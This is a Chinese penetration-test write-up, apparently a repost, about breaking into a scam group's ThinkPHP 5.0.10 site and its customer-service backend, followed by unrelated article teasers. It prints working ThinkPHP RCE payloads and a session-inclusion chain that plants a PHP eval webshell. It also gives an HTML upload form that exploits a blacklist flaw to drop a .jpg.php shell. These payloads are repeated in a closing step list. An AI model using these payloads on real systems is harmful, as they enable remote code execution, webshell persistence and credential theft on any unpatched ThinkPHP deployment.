深入诈骗团队

最近接到任务,调查一个诈骗团伙


上面有一个注册接口,直接先注册一个用户看看他们怎么诈骗的

好家伙,用户赚了8个亿,充值过的用户直呼内行。
这种站点一看就是那种诈骗团伙的杀猪盘,使用的那种tp5的框架一键搭建,方便又省事。后来根据报错信息的确是tp5.0.10的框架还开了debug模式,老杀猪盘了。

直接先用tp5rce打出phpinfo看

s=captcha
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo


看来禁的函数比较多,这个时候用tp5的rce和写shell就比较困难,使用tp5日志包含和session包含来getshell就十分的方便。
日志包含还需要去找文件,我这里就直接是session包含来getshell
先通过设置session会话并传入一句话木马

?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1


然后直接利用文件包含去包含session文件,tp5的session文件一般都是在/tmp下面,文件名为sess_sessionid

?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3&x=phpinfo();


这个时候我们就可以通过蚁剑连上shell了
需要把post传入的参数加在蚁剑连接的http body里面

连上后通过找到config下的database.php找到数据库密码账号

里面还有财务和技术的联系方式

直接登陆后台

好家伙,会员数30人,还有400多个机器人,金额在后台可以随便修改,太欺负人了。

打到这里总感觉信息还有点少啊,只有几个手机号,还有诈骗团伙的用来收款的银行卡,于是我又在运营站上面收集信息,原来客服的站点是其他服务器上面

通过目录扫描找到客服后台

试了一下弱口令,居然连admin这个用户都没有,这管理员意识还挺好的。
拿出我珍藏的字典爆破了一下,也没有发现存在的用户,我猜测他的用户名要么是电话号码,要么就是很长的用户名。
看来进后台是不行的了
然后通过ip反查发现也没有旁站,这个站点只有这个客服系统

扫了一下子域名也没有任何的发现
但是页面下面有一个Powered by 爱客服PHP在线客服系统,我觉得网上应该是有源码的,就去百度了一下,还真有源码。

网站是基于tp二次开发的,但是tp的rce已经没有了。
只有一步步的审计了
翻了很久在application/admin/controller/Event.php文件中找到了一处基于黑名单的上传函数uploadimg

定义一个上传函数uploadimg,然后定义一个变量name来获取到文件名,并用一个点以数组的方式隔开,而通过变量ext来获取到数组的第二个作为检测,当文件传入index.html,$ext=html,html在黑名单内所以就上传不成功,如果是文件传入index.jpg.php,$ext=jpg,jpg没有在黑名单,所以就可以上传成功。
根据tp的路由规则这个上传点应该在/admin/event/uploadimg这个位置

它这个页面没有上传点,只有自己构造一个上传页面了

<form action="http://ip/admin/event/uploadimg" method="post" enctype="multipart/form-data">
<label for="file">晨光客服上传</label>
<input type="file" name="editormd-image-file" id="editormd-image-file">
<input type="submit" name="submit" value="submit">
</form>

如果是上传index.php的话


的确是上传不成功的
如果是上传index.jpg.php

是可以上传成功的
拿下该客服站点

打包后台数据交给jc
在这里呼吁大家千万别相信什么刷单的,叫你充值就可以领钱的,都是假的,千万别想一夜暴富,占什么小便宜,天下没有免费的午餐。这里放几张图给大家看一下

这些诈骗团伙还理直气壮,有理有据,只会叫你越充越多,典型的杀猪盘

渗透总结:

1.注册一个测试账号

2通过报错,发现是tp5.0..10

3.使用TP5RCE查看phpinfo

s=captcha

post:

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

发现危险函数被禁用了

4.使用tp5日志包含和session包含来getshell

5.通过设置session会话并传入一句话木马

?s=captcha

post:

_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1

6.利用文件包含去包含session文件,tp5的session文件一般都是在/tmp下面,文件名为sess_sessionid

?s=captcha

post:

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3&x=phpinfo();

7.通过蚁剑连上shell,需要把post传入的参数加在蚁剑连接的http body里面

8.通过后台源码查看发现客户服务后台。

9.发现服务后台为爱客服PHP在线客服系统,该系统存在文件上传漏洞

/admin/event/uploadimg

<form action="http://ip/admin/event/uploadimg" method="post" enctype="multipart/form-data">

<label for="file">晨光客服上传</label>

<input type="file" name="editormd-image-file" id="editormd-image-file">

<input type="submit" name="submit" value="submit">

</form>

原文链接: https://xz.aliyun.com/t/9286

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/43791.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【安全资讯】网络犯罪集团通过COVID-19诈骗等手段获利5500万美元

作者&#xff5c;星辰大海来源&#xff5c;嘶吼网发布时间&#xff5c;2021-02-24 美国执法部门逮捕了一家总部位于加纳的网络犯罪集团的6名 “头目”&#xff0c;据称他们最早曾在2013年就发起了一系列的金融诈骗骗局&#xff0c;其中包括恋爱诈骗、商业电子邮件泄露攻击等多种…

防不胜防,10分钟就被AI骗走430万!真实诈骗案震惊全网

来源&#xff1a;量子位 本文为2891字&#xff0c;建议阅读7分钟 本文介绍AI诈骗案件背后的技术和机制。 防不胜防&#xff0c;10分钟就被AI骗走430万&#xff01; 这是这两天震惊全网的真实诈骗案件。 据包头警方发布&#xff0c;一公司老板接到朋友的微信视频电话&#xff0c…

当诈骗团伙撞上网络安全研究员,会发生什么?

勤恳好学的小凯&#xff0c;工作之余报名了一个培训。 这天&#xff0c;他接到电话&#xff0c;对方说&#xff1a;因为疫情原因&#xff0c;培训不得不取消&#xff0c;现在我们正在统一退款给学员&#xff0c;麻烦你加一下我们的退款群&#xff0c;给你安排退款。 小凯心想…

记一次勒索病毒中招 (赎金已交)

从没想过自己会中勒索病毒 因为用电脑几十年, 自己也算比较懂电脑的, 使用习惯一直都很好 某天起床, 打开E盘, 一眼就发现自己中了勒索病毒 随即马上开始根据扩展名进行research, 看看有没有救 很容易能找到病毒名, 然后得到以下情报 1 很多网站会提供杀毒软件, 和数据恢复软件…

伊朗称以色列和美国可能是加油站网络攻击的幕后黑手、新型勒索软件或成为最大的新兴风险|11月1日全球网络安全热点

安全资讯报告 美国TrickBot恶意软件开发者或将面临60年监禁 一名据信是TrickBot恶意软件开发团队成员的俄罗斯国民已被引渡到美国&#xff0c;目前面临可能使他入狱60年的指控。 起诉书称&#xff0c;38岁的Vladimir Dunaev&#xff0c;也被称为FFX&#xff0c;是一名恶意软件开…

在其他国家被揭穿骗子又盯上非洲? 这几个骗子公司可把非洲人民坑苦了……...

来源 | Bitcoin 编译 | Guoxi 责编 | Carol 出品 | 区块链大本营&#xff08;blockchain_camp&#xff09; 网上有这么一句话来形容投资&#xff1a;“你看中的是别人的收益&#xff0c;别人看中的是你的本金。”的确&#xff0c;投资一直是一场富贵险中求的赌博&#xff0c;加…

当程序员遇上电信诈骗犯 黑掉对方电脑!成功反制

来源&#xff1a;站长之家 作者&#xff1a;站长之家 电信诈骗手段花样百出&#xff0c;让许多普通民众防不胜防。日前&#xff0c;一程序员遇上电信诈骗犯后&#xff0c;却机智设下陷阱&#xff0c;让诈骗分子栽了跟斗。不得不说这个程序员套路太深&#xff0c;下面就来一起看…

一个有趣的英文文献翻译工具——CopyTranslator

Github链接&#xff1a;https://github.com/elliottzheng/CopyTranslator/blob/master/README_zh.md 百度网盘下载地址&#xff1a;https://pan.baidu.com/s/1mySoacl-V6tGE2xCH79wyQ#list/path%2F 在做英文文献阅读过程中&#xff0c;有时候遇到长段文字难以去理解&#xff…

写论文时如何翻译外文文献?

搞科研就是集所有既有成果为大成者。 想要论文写得好&#xff0c;一定要有丰富的知识储备和对该领域专业技能的熟练掌握&#xff0c;这其中不可能少的了外文文献的知识储备。 外文文献的阅读十分重要。那么阅读的前提是什么呢&#xff1f;翻译&#xff01; 外文文献翻译是对…

如何快速的翻译并阅读外文文献

本文适用一些想要快速了解文献内容的童鞋。在进行查找文献时,不可避免要查找外文文献,其中以英文居多,当然也有可能涉及到其他语言。像楼主这样学了十几年英语,然而听说读写弱鸡的人,面对英语时,会头痛。要是查到其他语言的文献时,估计要死的心都有了。然而不用害怕,在…

php的外文参考文献_php英文文献翻译及参考文献

php英文文献翻译及参考文献 php 英文文献翻译及参考文献 PHP is a scripting language originally designed for producing dynamic web pages. It has evolved to include a command line interface capability and can be used in standalone graphical applications. While…

有哪些将英文文献翻译为中文的网站或软件?

你的英语怎么样呢&#xff1f;你是否看到英文资料就头疼呢&#xff1f;是否经常用翻译工具翻译呢&#xff1f;相信很多小伙伴拿到全是英文的文档资料&#xff0c;脑袋就大了&#xff0c;最常见的操作就是一段一段的复制到翻译工具翻译。今天我们要来分享的两个翻译工具就是可以…

英文文献翻译神器SCITranslate V17--一键翻译整篇文献

SCITranslate是一款可以对英文文章进行全文翻译的神器&#xff0c;内置多引擎翻译&#xff0c;各类专业的复杂词汇都可以翻译出来&#xff0c;医学生也可以放心使用。而且通过SCITranslate翻译出来的文章语句简练、通顺&#xff0c;软件支持人工翻译&#xff0c;进一步提升论文…

英文文献翻译软件,你知道哪些呢?

点击上方“3D视觉工坊”&#xff0c;选择“星标” 干货第一时间送达 https://www.zhihu.com/question/348037868/answer/1103006023 申明&#xff1a;本文仅做学术分享&#xff0c;侵删。 作者&#xff1a;独角兽 https://www.zhihu.com/question/348037868/answer/965847620 相…

精选3款论文翻译神器,直接翻译PDF全文英文文献!

全文翻译神器 SCI Translate 17.0 SCI Translate 是来自国外的一款方便实用&#xff0c;功能强大的论文翻译软件。只需轻轻框选&#xff0c;就可以实现段落甚至整页的快速精准翻译&#xff01;&#xff01; 权威例句翻译&#xff1a;其中SCI双语论文例句40万&#xff0c;医学单…

哪些软件翻译英文文献比较准确呢?

来自&#xff1a; https://www.zhihu.com/question/348037868/answer/1103006023 编辑&#xff1a;王萌 澳门城市大学(深度学习冲鸭公众号) 本文仅作学术分享&#xff0c;若侵权&#xff0c;请联系后台删文处理 一 作者&#xff1a;量子位 https://www.zhihu.com/question/3480…

非常简单的语音朗读功能

不知道大家有没有发现&#xff0c;在System.Speech.Synthesis命名空间下有一个SpeechSynthesizer类&#xff0c;它可以指定的文本内容进行语音朗读&#xff0c;而且&#xff0c;这个类用起来也严重简单&#xff0c;简单到什么程度? 试试看。 首先&#xff0c;新建一个项目&am…

这几个文字转语音朗读软件很好用

大家平时在闲暇时&#xff0c;会不会看一些报刊新闻来了解时事&#xff1f;在大数据时代下&#xff0c;我们每天都能看到很多不重样的热点新闻。不过有的时候&#xff0c;我们并非能时时刻刻都能看新闻&#xff0c;特别是当我们开车或是在上下班通勤的时候&#xff0c;我们很难…

利用微软Text-To-Speech朗读文本

我超爱看小说&#xff0c;由于长时间盯着电脑眼睛疼&#xff0c;所以从网上下载了一款《读书狼》的软件。虽然达不到真人念书的水平&#xff0c;但是为了保护宝贵的眼睛&#xff0c;这也算是不错的了。然后自己想做一个类似的小工具。而且要是可以的话&#xff0c;可以在生产车…

超实用Mac苹果电脑终端命令

苹果Mac电脑可以使用老式终端来运行无法从应用程序或菜单访问的简单命令&#xff0c;下面是macw总结了几条非常好用的终端命令&#xff0c;分享给大家。 终端应用程序存储在应用程序 > 实用程序下&#xff0c;但您可以随时通过按 CommandSpace 打开 Spotlight&#xff0c;搜…